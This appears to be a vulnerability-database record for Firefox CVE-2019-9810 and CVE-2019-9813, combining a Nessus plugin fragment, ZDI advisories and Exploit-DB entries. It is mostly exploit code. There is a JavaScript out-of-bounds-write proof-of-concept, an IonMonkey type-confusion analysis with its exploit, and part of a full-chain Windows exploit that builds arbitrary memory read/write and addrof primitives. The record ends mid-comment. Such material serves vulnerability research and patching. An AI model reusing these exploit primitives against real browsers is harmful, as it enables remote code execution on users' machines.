(CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox version 66.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (is_esr) exit(0, 'The Mozilla Firefox installation is in the ESR branch.');\n\nmozilla_check_version(version:version, path:path, product:'firefox', esr:FALSE, fix:'66.0.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2020-06-22T11:42:10", "bulletinFamily": "info", "cvelist": ["CVE-2019-9810"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of Array.slice when executed within JIT compiled code. By performing actions in JavaScript, an attacker can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-04-15T00:00:00", "id": "ZDI-19-364", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-364/", "title": "(Pwn2Own) Mozilla Firefox Array.slice Out-Of-Bounds Write Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:39:57", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within IonMonkey. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-04-15T00:00:00", "id": "ZDI-19-365", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-365/", "title": "(Pwn2Own) Mozilla Firefox IonMonkey Optimizer Type Confusion Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-03-26T15:27:27", "description": "", "published": "2019-03-26T00:00:00", "type": "exploitdb", "title": "Firefox &lt; 66.0.1 - &#039;Array.prototype.slice&#039; Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810"], "modified": "2019-03-26T00:00:00", "id": "EDB-ID:46605", "href": "https://www.exploit-db.com/exploits/46605", "sourceData": "<script>\r\n\r\nlet size = 64;\r\n\r\ngarr = [];\r\nj = 0;\r\nfunction gc(){\r\n\tvar tmp = [];\r\n\tfor(let i = 0;i < 0x20000;i++){\r\n\t\ttmp[i] = new Uint32Array(size * 2);\r\n\t\tfor(let j = 0;j < (size*2);j+=2){\r\n\t\t\ttmp[i][j] = 0x12345678;\r\n\t\t\ttmp[i][j+1] = 0xfffe0123;\r\n\t\t}\r\n\t}\r\n\tgarr[j++] = tmp;\r\n}\r\n\r\nlet arr = [{},2.2];\r\n\r\nlet obj = {};\r\n\r\nobj[Symbol.species] = function(){\r\n\tvictim.length = 0x0;\r\n\tfor(let i = 0;i < 0x2000;i++){\r\n\t\tgvictim[i].length = 0x0;\r\n\t\tgvictim[i] = null;\r\n\t}\r\n\tgc();\r\n\t//Array.isArray(garr[0][0x10000]);\r\n\treturn [1.1];\r\n}\r\n\r\nlet gvictim = [];\r\n\r\nfor(let i = 0;i < 0x1000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nlet victim = [1.1,2.2];\r\nvictim.length = size;\r\nvictim.fill(3.3);\r\n\r\nfor(let i = 0x1000;i < 0x2000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nfunction fake(arg){\r\n}\r\nfor(let i = 0;i < size;i++){\r\n\tfake[\"x\"+i.toString()] = 2.2;\r\n}\r\n\r\nfunction jit(){\r\n\tvictim[1] = 1.1;\r\n\tarr.slice();\r\n\t//fake.x2 = 6.17651672645e-312;\r\n\treturn victim[2];\r\n}\r\n\r\nflag = 0;\r\n\r\n\r\nfor(let i = 0;i < 0x10000;i++){\r\n\txx = jit();\r\n}\r\n\r\narr.constructor = obj;\r\n\r\nArray.isArray(victim);\r\nalert(333);\r\nalert(jit());\r\n</script>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46605"}, {"lastseen": "2019-04-03T18:03:22", "description": "", "published": "2019-04-03T00:00:00", "type": "exploitdb", "title": "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-04-03T00:00:00", "id": "EDB-ID:46646", "href": "https://www.exploit-db.com/exploits/46646", "sourceData": "A bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects.\r\n\r\n# Prerequisites\r\n\r\nIn Spidermonkey, every JavaScript objects is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically:\r\n\r\n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below)\r\n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot\r\n* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array\r\n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored\r\n\r\nSpidermonky makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\"widens\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. In the JIT compiler (IonMonkey), this is done through \"type barriers\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code.\r\n\r\n# Crashing Testcase\r\n\r\nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties:\r\n\r\n function hax(o, changeProto) {\r\n if (changeProto) {\r\n o.p = 42;\r\n o.__proto__ = {};\r\n }\r\n o.p = 13.37;\r\n return o;\r\n }\r\n\r\n for (let i = 0; i < 1000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n for (let i = 0; i < 10000; i++) {\r\n let o = hax({}, true);\r\n eval('o.p'); \t\t\t// Crash here\r\n }\r\n\r\n\r\nCrashes in debug builds of Spidermonkey with:\r\n\r\n Assertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265\r\n Hit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266\r\n\r\nThis assertion expresses that type inference data is inconsistent for the property .p as the type \"float\" is not in the list of possible types but the property currently holds a float value.\r\n\r\n# Bug Analysis\r\n\r\nIn essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment.\r\n\r\nIn detail, the following appears to be happening:\r\n\r\nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value.\r\n\r\nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will\r\n\r\n1. cause a new ObjectGroup to be allocated for O (because prototypes are stored in the object group) and\r\n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11].\r\n\r\nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode):\r\n\r\n // Verify that the input is an object with ObjectGroup OG1 or OG2 (actually\r\n // this check is performed before entering the JITed code)\r\n VerifyInputTypes\r\n\r\n if (changeProto) {\r\n // A SetProperty [12] inline cache [13] which will perform the actual\r\n // property store and speed up subsequent property stores on objects of\r\n // the same Shape and Group. Since a type barrier is required, the Group\r\n // is used as an additional index into the cache so that both Shape and\r\n // Group must match, in which case no inferred types could be\r\n // accidentially invalidated.\r\n SetPropertyICWithTypeBarrier o.p 42\r\n\r\n Call ChangePrototype(o, {})\r\n }\r\n\r\n // Another inline cache to store property .p again, but this time without a\r\n // type barrier. As such, only the Shape will be checked and not the Group.\r\n SetPropertyIC o.p 13.37\r\n\r\n Return o\r\n\r\nAfter compilation finishes, the following happens in the first invocation of the JITed code:\r\n\r\n* The function is called with an object of ObjectGroup OG2 and Shape S1\r\n* The property .p is stored on the object in the first SetProperty cache. This does not update any inferred type as OG2 does not use inferred types\r\n* The prototype of o is changed\r\n * This again causes a new ObjectGroup, OG3, to be allocated\r\n * When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14]\r\n * As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]}\r\n* The second propertystore cache runs into a cache miss (because it is empty at this point)\r\n * Execution transfers to the slow path (a runtime property store)\r\n * This will store the property and update the inferred types of OG3 to {.p: [int, float]}\r\n * It will then update the inline cache to now directly handle property stores to objects with shape S1\r\n * Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15]\r\n\r\nThen, in the second invocation of the JITed code:\r\n\r\n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype\r\n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1)\r\n* It then directly writes the property value into the property slot without updating inferred types\r\n\r\nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval().\r\n\r\nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly:\r\n\r\n1. Iterate over the set of possible object types, in this case that is OG1 and OG2\r\n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types\r\n\t- In this case, OG1 already has the correct type for property .p, so no violation there\r\n\t- And OG2 does not even track property types, so again no violation [17]\r\n3. If no violations were found, no type barrier is needed\r\n\r\nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determine that a type barrier is not needed, leading to the scenario described above.\r\n\r\n# Exploitation\r\n\r\nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved.\r\n\r\nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141:\r\n\r\n let ab = new ArrayBuffer(1024);\r\n\r\n function hax(o, changeProto) {\r\n // The argument type for |o| will be object of group OG1 or OG2. OG1 will\r\n // have the inferred types {.p: [Y]}. OG2 on the other hand will be an\r\n // ObjectGroup with unknown property types due to the prototype change. As\r\n // such, OG2 will never have any inferred property types.\r\n\r\n // Ultimately, this code will confuse types X and Y with each other.\r\n // Type X: a Uint8Array\r\n let x = new Uint8Array(1024);\r\n // Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :)\r\n let y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};\r\n\r\n if (changeProto) {\r\n o.p = x;\r\n\r\n // This prototype change will cause a new ObjectGroup, OG_N, to be\r\n // allocated for o every time it is executed (because the prototype is\r\n // stored in the ObjectGroup). During creation of the new ObjectGroup,\r\n // the current property values will be used to infer property types. As\r\n // such, OG_N will have the inferred types {.p: [X]}.\r\n o.__proto__ = {};\r\n }\r\n\r\n // This property write was not marked as requiring type barriers to\r\n // validate the consistency of inferred property types. The reason is that\r\n // for OG1, the property type is already correct and OG2 does not track\r\n // property types at all. However, IonMonkey failed to realize that the\r\n // ObjectGroup of o could have changed in between to a new ObjectGroup that\r\n // has different inferred property types. As such, the type barrier\r\n // omission here is unsafe.\r\n //\r\n // In the second invocation, the inline cache for this property store will\r\n // then be a hit (because the IC only uses the Shape to index the cache,\r\n // not the Group). As such, the inferred types associated with the\r\n // ObjectGroup for o will not be updated and will be left inconsistent.\r\n o.p = y;\r\n\r\n return o;\r\n }\r\n\r\n function pwn(o, trigger) {\r\n if (trigger) {\r\n // Is on a code path that wasn't executed in the interpreter so that\r\n // IonMonkey solely relies on type inference instead of type profiles\r\n // from the interpreter (which would show the real type).\r\n return o.p[0];\r\n } else {\r\n return 42;\r\n }\r\n }\r\n\r\n // \"Teach\" the function hax that it should accept objects with ObjectGroup OG1.\r\n // This is required as IonMonkey needs to have at least one \"known\" type when\r\n // determining whether it can omit type barriers for property writes:\r\n // https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282\r\n for (let i = 0; i < 10000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n // Compile hax to trigger the bug in such a way that an object will be created\r\n // whose ObjectGroup indicates type X for property .p but whose real type will\r\n // be Y, where both X and Y can be arbitrarily chosen.\r\n let evilObj;\r\n for (let i = 0; i < 10000; i++) {\r\n evilObj = hax({}, true);\r\n\r\n // Not sure why this is required here, it maybe prevents JITing of the main\r\n // script or similar...\r\n eval('evilObj.p');\r\n }\r\n\r\n // JIT compile the second function and make it rely on the (incorrect) type\r\n // inference data to omit runtime type checks.\r\n for (let i = 0; i < 100000; i++) {\r\n pwn(evilObj, false);\r\n }\r\n\r\n // Finally trigger a type confusion.\r\n pwn(evilObj, true);\r\n\r\nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) convenient way.\r\n\r\n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54\r\n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463\r\n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87\r\n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37\r\n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466\r\n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469\r\n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448\r\n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254\r\n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/\r\n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219\r\n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946\r\n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280\r\n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache\r\n[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259\r\n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544\r\n[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268\r\n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293\r\n[18] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187\r\n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca\r\n\r\n Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1538120\r\n\r\n\r\n Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813 (bug collision with a pwn2own entry)\r\n\r\nThe issue was fixed in two ways:\r\n\r\n1. in https://github.com/mozilla/gecko-dev/commit/0ff528029590e051baa60265b3af92a632a7e850 the code that adds inferred properties after a prototype change (step `* When creating the new group, property types are inferred from the current object` above) was changed to no longer create inferred property types when coming from Groups marked as having unknownProperties. As such, in this case the new ObjectGroups created from OG2 would now all have unknownProperties as well.\r\n\r\n2. in https://github.com/mozilla/gecko-dev/commit/f8ce40d176067800e5dda013fb4d8ff9e91d9a88 the function responsible for determining whether write barriers can be omitted (jit::PropertyWriteNeedsTypeBarrier) was modified to always emit write barriers if one of the input groups has unknownProperties.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46646"}, {"lastseen": "2019-12-09T06:27:08", "description": "", "published": "2019-12-07T00:00:00", "type": "exploitdb", "title": "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810", "CVE-2019-11708"], "modified": "2019-12-07T00:00:00", "id": "EDB-ID:47752", "href": "https://www.exploit-db.com/exploits/47752", "sourceData": "// Axel '0vercl0k' Souchet - November 19 2019\r\n\r\n// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip\r\n\r\n// 0:000> ? xul!sAutomationPrefIsSet - xul\r\n// Evaluate expression: 85724947 = 00000000`051c0f13\r\nconst XulsAutomationPrefIsSet = 0x051c0f13n;\r\n// 0:000> ? xul!disabledForTest - xul\r\n// Evaluate expression: 85400792 = 00000000`05171cd8\r\nconst XuldisabledForTest = 0x05171cd8n;\r\n\r\nconst Debug = false;\r\nconst dbg = p => {\r\n if(Debug == false) {\r\n return;\r\n }\r\n\r\n print(`Debug: ${p}`);\r\n};\r\n\r\nconst ArraySize = 0x5;\r\nconst WantedArraySize = 0x42424242;\r\n\r\nlet arr = null;\r\nlet Trigger = false;\r\nconst Spray = [];\r\n\r\nfunction f(Special, Idx, Value) {\r\n arr[Idx] = 0x41414141;\r\n Special.slice();\r\n arr[Idx] = Value;\r\n}\r\n\r\nclass SoSpecial extends Array {\r\n static get [Symbol.species]() {\r\n return function() {\r\n if(!Trigger) {\r\n return;\r\n }\r\n\r\n arr.length = 0;\r\n for(let i = 0; i < 0x40000; i++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n };\r\n }\r\n};\r\n\r\nfunction GetMeBiggie() {\r\n for(let Idx = 0; Idx < 0x100000; Idx++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n\r\n const SpecialSnowFlake = new SoSpecial();\r\n for(let Idx = 0; Idx < 10; Idx++) {\r\n arr = new Array(0x7e);\r\n Trigger = false;\r\n for(let Idx = 0; Idx < 0x400; Idx++) {\r\n f(SpecialSnowFlake, 0x70, Idx);\r\n }\r\n\r\n Trigger = true;\r\n f(SpecialSnowFlake, 47, WantedArraySize);\r\n if(arr.length != 0) {\r\n continue;\r\n }\r\n\r\n const Biggie = Spray.find(e => e.length != ArraySize);\r\n if(Biggie != null) {\r\n return Biggie;\r\n }\r\n }\r\n\r\n return null;\r\n}\r\n\r\nfunction ExploitCVE_2019_9810() {\r\n print = console.log;\r\n\r\n const Biggie = GetMeBiggie();\r\n if(Biggie == null || Biggie.length != WantedArraySize) {\r\n dbg('Failed to set things up :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Scan for one of the Uint32Array we sprayed earlier.\r\n //\r\n\r\n let Biggie2AdjacentSize = null;\r\n const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);\r\n for(let Idx = 0; Idx < 0x100; Idx++) {\r\n const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);\r\n if(Qword == JSValueArraySize) {\r\n Biggie2AdjacentSize = Idx + 1;\r\n break;\r\n }\r\n }\r\n\r\n if(Biggie2AdjacentSize == null) {\r\n dbg('Failed to find an adjacent array :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Use the array length as a marker.\r\n //\r\n\r\n const AdjacentArraySize = 0xbbccdd;\r\n Biggie[Biggie2AdjacentSize] = AdjacentArraySize;\r\n\r\n //\r\n // Find the array now..\r\n //\r\n\r\n const AdjacentArray = Spray.find(\r\n e => e.length == AdjacentArraySize\r\n );\r\n\r\n if(AdjacentArray == null) {\r\n dbg('Failed to find the corrupted adjacent array :(.');\r\n return false;\r\n }\r\n\r\n const ReadPtr = Addr => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Read arbitrary location now.\r\n //\r\n\r\n const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return Ptr;\r\n };\r\n\r\n const WritePtr = (Addr, Value) => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Write to arbitrary location now.\r\n //\r\n\r\n AdjacentArray[0] = Number(Value & 0xffffffffn);\r\n AdjacentArray[1] = Number(Value >> 32n);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return true;\r\n };\r\n\r\n const AddrOf = Obj => {\r\n AdjacentArray.hell_on_earth = Obj;\r\n // 0:000> dqs 1ae5716e76a0\r\n // 00001ae5`716e76a0 00001ae5`7167dfd0\r\n // 00001ae5`716e76a8 000010c5`8e73c6a0\r\n // 00001ae5`716e76b0 00000238`9334e790\r\n // 00001ae5`716e76b8 00007ff6`6be55010 js!emptyElementsHeader+0x10\r\n // 00001ae5`716e76c0 fffa0000`00000000\r\n // 00001ae5`716e76c8 fff88000`00bbccdd\r\n // 0:000> !telescope 0x00002389334e790\r\n // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown)\r\n const SlotOffset = Biggie2AdjacentSize - (3 * 2);\r\n const SlotsAddress = BigInt.fromUint32s(\r\n Biggie.slice(SlotOffset, SlotOffset + 2)\r\n );\r\n\r\n return BigInt.fromJSValue(ReadPtr(SlotsAddress));\r\n };\r\n\r\n //\r\n // Let's move the battle field to the TenuredHeap\r\n //\r\n\r\n const ArrayBufferLength = 10;\r\n const AB1 = new ArrayBuffer(ArrayBufferLength);\r\n const AB2 = new ArrayBuffer(ArrayBufferLength);\r\n const AB1Address = AddrOf(AB1);\r\n const AB2Address = AddrOf(AB2);\r\n\r\n dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`);\r\n dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`);\r\n WritePtr(AB1Address + 0x28n, 0xfff8800000010000n);\r\n WritePtr(AB2Address + 0x28n, 0xfff8800000010000n);\r\n\r\n if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) {\r\n dbg('Corrupting the ArrayBuffers failed :(.');\r\n return false;\r\n }\r\n\r\n const Primitives = BuildPrimitives(AB1, AB2);\r\n Math.atan2(AB2);\r\n\r\n //\r\n // All right, time to clean up behind ourselves.\r\n // Let's fix AdjacentArray's size first (as we are using Biggie to do it).\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = ArraySize;\r\n\r\n //\r\n // Let's fix Biggie's length as we are done with it.\r\n // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580\r\n // Detected xul.dll, using it as js module.\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Type: Uint32Array\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Length: 1337\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteLength: 5348\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Content: Uint32Array({Length:1337, ...})\r\n // @$smdump_jsvalue(0xfffe11e6fa2f7580)\r\n //\r\n // 0:000> !telescope 0x11e6fa2f7580\r\n // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown)\r\n // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown)\r\n // 